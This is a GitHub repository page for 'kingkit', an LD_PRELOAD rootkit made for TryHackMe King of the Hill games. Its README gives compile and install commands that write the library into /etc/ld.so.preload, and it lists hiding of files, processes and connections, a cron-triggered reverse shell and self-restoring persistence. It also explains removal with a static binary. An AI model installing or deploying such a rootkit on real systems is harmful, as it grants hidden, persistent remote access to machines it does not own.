Skip to content
/ kingkit Public

ld preload rootkit for tryhackme king of the hill games

License

GPL-3.0 license
0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

0xarnout/kingkit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

26 Commits
.gitignore
.gitignore
 
 
COPYING
COPYING
 
 
README.md
README.md
 
 
kingkit.c
kingkit.c
 
 
remove
remove
 
 
remove.c
remove.c
 
 

Repository files navigation

Kingkit is a rootkit designed for KOTH on tryhackme

usage

Compile the rootkit with:

gcc kingkit.c -shared -fPIC -ldl -o kingkit.so

Then you can install the rootkit with:

cp ./kingkit.so /lib/kingkit.so
echo "/lib/kingkit.so" > /etc/ld.so.preload

Because of conflicting glibc versions you need to compile the rootkit on a koth machine. The easiest option is to compile on the food machine because it is available as a room, after you compiled it you can use that binary on all koth machines. Also make sure to change the macro KING_NAME to your own nickname.

features

  • Protect and write name to king.txt
  • Redirect writes to /etc/ld.so.preload to FAKE_PRELOAD
  • Protect the rootkit library and FAKE_PRELOAD
  • Hiding files and directories starting with HIDE_PREFIX
  • Reverse shell persistence
  • Hiding processes and connections from netstat, ps and lsof
  • Automatic restoration of the library after deletion

reverse shell

The rootkit can spawn a reverse shell every minute by hooking the time() function in cron. To use this feature you have to change the HOST and PORT macros to your vpn ip address and the port netcat (or a different tool) is listening on. Additionally you have to restart the cron daemon so the rootkit is loaded by cron, to do that run systemctl restart cron on the box after the rootkit is installed.

remove LD_PRELOAD rootkits

While LD_PRELOAD rootkits are very powerful, they have a critical weakness: static binaries are not affected. So to remove a LD_PRELOAD rootkit all you need is a static binary that removes the /etc/ld.so.preload file. To make things easier for you this repository already includes a static binary that removes the /etc/ld.so.preload file, run it with: chmod +x remove && ./remove. You can also compile it from source with gcc remove.c -static -o remove. Apart from the /etc/ld.so.preload file the LD_PRELOAD environment variable can also be used to load the malicious library. The environment variable can be removed with: unset LD_PRELOAD.

resources about LD_PRELOAD rootkits

Note

I am not responsible for any damage caused by this tool, make sure you understand what you are doing and use this tool for educational purposes only.

About

ld preload rootkit for tryhackme king of the hill games

Topics

koth thm king-of-the-hill tryhackme

Resources

Readme

License

GPL-3.0 license
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages